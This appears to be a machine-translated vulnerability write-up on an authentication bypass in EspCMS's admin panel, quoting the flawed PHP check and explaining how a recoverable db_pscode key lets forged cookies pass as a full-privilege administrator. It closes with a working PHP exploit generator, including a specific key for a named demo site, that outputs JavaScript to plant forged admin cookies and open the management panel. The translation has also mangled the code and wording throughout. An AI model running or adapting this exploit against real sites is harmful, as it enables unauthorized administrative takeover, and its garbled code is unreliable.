EspCMS background login Bypass Vulnerability Reuse

I submitted a report on the April 13 vulnerability platform in 360, and provided a tool to calculate db_pscode. Db_pscode is a String constant randomly generated during installation and saved in the configuration file. On July 6, April 22, the new version was officially released, which improved the method for generating db_pscode during program installation and "fixed" the vulnerability. In fact, the official website only defended against the exp at that time and did not fundamentally prevent the vulnerability. Before the 22nd, it was a 32-bit md5hash string. The length of this change may be 1-39 characters, but it can still be reversed, this vulnerability is still exploited by server bypass. Let's take a look at the important class constructor on the main interface of EspCMS background verification process management:

<? Php // adminsoft/management. phpclass important extends connector {function important () {$ this-> softbase (true); // The constructor calls the softbase function in the parent class, the softbase function calls the admin_purview function to verify the logon status.} --- // The softbase function in the parent class connector // public/class_connector.phpclass connector {function softbase ($ admin_purview = false) {header ("Content-Type: text/html; charset = UTF-8"); $ this-> dbmysql (); $ this-> commandinc (); $ this-> systemfile (); $ this-> Cachedb (); if ($ admin_purview) {$ this-> admin_purview (); // check whether the Administrator has logged on to $ this-> sitelng = $ this-> getlng (); $ action = $ this-> fun-> accept ('action ', 'R'); if (in_array ($ action, $ this-> esp_powerlist )&&! In_array ('all', $ this-> esp_powerlist) {exit ('permissions errors '); // $ this-> esp_powerlist permission list. It is OK if it is set to all }}..... // public/class_connector.phpfunction admin_purview () {if ($ this-> fun-> accept ('archive', 'R ') = 'filemanage' & $ this-> fun-> accept ('action', 'R') = 'batupfilesave ') {$ ecisp_admininfo = $ this-> fun-> accept ('ecisp _ admininfo', 'G '); $ esp_powerlist = $ this-> fun-> accept ('Esp _ powerlist', 'G'); $ gettype = false ;} else {$ ecisp_admininfo = $ this-> fun-> accept ('ecisp _ admininfo', 'C '); $ esp_powerlist = $ this-> fun-> accept ('Esp _ powerlist', 'C'); $ gettype = true; // The above two data can be obtained from the cookie and get parameters. // Let's start with the cookie directly. First, it's hidden and there's no shadow, second, the parameter value can be saved. // $ esp_powerlist is the permission list. Here we decode all, that is, the Administrator with all permissions. // $ ecisp_admininfo stores some administrator information }// the following db_pscode can be controlled, $ ecisp_admininfo can be constructed by ourselves to further control $ arr_purview and $ this-> esp_powerlist $ arr_purview = explode ('|', $ this-> fun-> eccode ($ ecisp_admininfo, 'decode', db_pscode); $ this-> esp_powerlist = explode ('|', $ this-> fun-> eccode ($ esp_powerlist, 'decode', db_pscode )); // "1 | c4rp3nt3r | 12345678901234567890123456789012 | md5 ('mozilla/5.0 (X11; Linux i686; rv: 18.0) Gecko/100') | 1 | management | ". ms5 (' http://scan.hackme.info/espcms/adminsoft/ '); List ($ this-> esp_adminuserid, $ this-> esp_username, $ this-> esp_password, $ this-> esp_useragent, $ this-> esp_powerid, $ this-> esp_inputclassid, $ this-> esp_softurl) = $ arr_purview; if ($ gettype) {// The parameter Program Submitted by cookie enters here as long as the following conditions are met to make $ condition = 1; the Administrator authentication is passed. // The problem here is that all data is not verified in the database again (if the verification is performed, it is estimated that SQL injection will be generated :) // we construct $ this-> esp_username = 'c4rp3nt3r '; $ this-> esp_adminuserid = '1'; $ this-> esp_softurl is the if (empt Y ($ this-> esp_username) | empty ($ this-> esp_adminuserid) | md5 (admin_AGENT )! = $ This-> esp_useragent | md5 (admin_ClassURL )! = $ This-> esp_softurl) {$ condition = 0;} else {$ condition = 1 ;}} else {if (empty ($ this-> esp_username) | empty ($ this-> esp_adminuserid) | md5 (admin_ClassURL )! = $ This-> esp_softurl) {$ condition = 0;} else {$ condition = 1 ;}} if ($ condition = 0) {if ($ this-> fun-> accept ('archive', 'R ')! = 'Adminuser' & $ this-> fun-> accept ('action', 'R ')! = 'Login') {header ('location: index. php? Archive = adminuser & action = login '); exit ();}} else {// has passed administrator verification :-) if ($ condition = 1 & $ this-> fun-> accept ('point', 'R ') = ''& $ this-> fun-> accept ('archive', 'R ') = ''& $ this-> fun-> accept ('action', 'R') ='') {header ('location: index. php? Archive = management & action = tab & loadfun = mangercenter & out = tabcenter '); exit ();}}}

Here, the key is $ this-> fun-> eccode (). The decryption key db_pscode is obtained. By comparing plaintext and ciphertext, this value can be reversed: for unnecessary misunderstanding and trouble, the specific code for calculating db_pscode is not provided here. Let's talk about the following method: Use useragent and the website root directory URL to reverse the string value that exceeds 66 characters. After 0422, if the length of db_pscode is within 32 bits, you can also get the 32-bit verification code by sending a verification email somewhere else. N multiple methods. The following code is generated using the javascript code bypassed in the background:

<? Php // code by c4rp3nt3r@0x50sec.org $ admin_AGENT = $ _ SERVER ['HTTP _ USER_AGENT ']; //////////////////////////////////////// //// // $ admin_ClassURL =' http://demo.ecisp.cn /Adminsoft '; $ key = "b229c152dsafsdafasfsadfasfdsfcbda220a9c5 ";// http://demo.ecisp.cn Db_pscode (20130425) of this website) //////////////////////////////////////// //// // $ powerlist = 'all '; $ admininfo = '1 | espcmsadmin | cccccccccccccccccccccccccccccccccc | '. md5 ($ admin_AGENT ). '| 1 | 1 | '. md5 ($ admin_ClassURL); $ esp_powerlist = eccode ($ powerlist, 'enabled', $ key); $ ecisp_admininfo = eccode ($ admininfo, 'enabled', $ key ); $ exploit = ''; $ exploit =" document. cookie = 'Esp _ powerlist = $ esp_powerlis T'; \ n "; $ exploit. = "document. cookie = 'ecisp _ admininfo = $ ecisp_admininfo'; \ n "; $ exploit. = "// alert (document. cookie); \ n "; $ exploit. = "window. location. href = '". $ admin_ClassURL. "/index. php? Archive = management & action = tab & loadfun = mangercenter & out = tabcenter '; \ n "; echo" <pre> ". $ exploit. "</pre>"; function eccode ($ string, $ operation = 'decode', $ key = '@ LFK24s224 % @ safS3s % 1f % ') {$ result = ''; // echo '^ '. $ key. "^ \ n"; if ($ operation = 'encode') {for ($ I = 0; $ I <strlen ($ string); $ I ++) {$ char = substr ($ string, $ I, 1); $ keychar = substr ($ key, ($ I % strlen ($ key)-1, 1 ); $ char = chr (ord ($ char) + ord ($ keychar); $ result. = $ char;} $ result = base64_encode ($ result); $ result = str_replace (array ('+', '/', '='), array ('-', '_', ''), $ result);} elseif ($ operation = 'decode') {$ data = str_replace (array ('-','_'), array ('+', '/'), $ string); $ mod4 = strlen ($ data) % 4; if ($ mod4) {$ data. = substr ('====', $ mod4) ;}$ string = base64_decode ($ data); for ($ I = 0; $ I <strlen ($ string ); $ I ++) {$ char = substr ($ string, $ I, 1); $ keychar = substr ($ key, ($ I % strlen ($ key )) -1, 1); $ char = chr (ord ($ char)-ord ($ keychar); $ result. = $ char ;}} return $ result ;}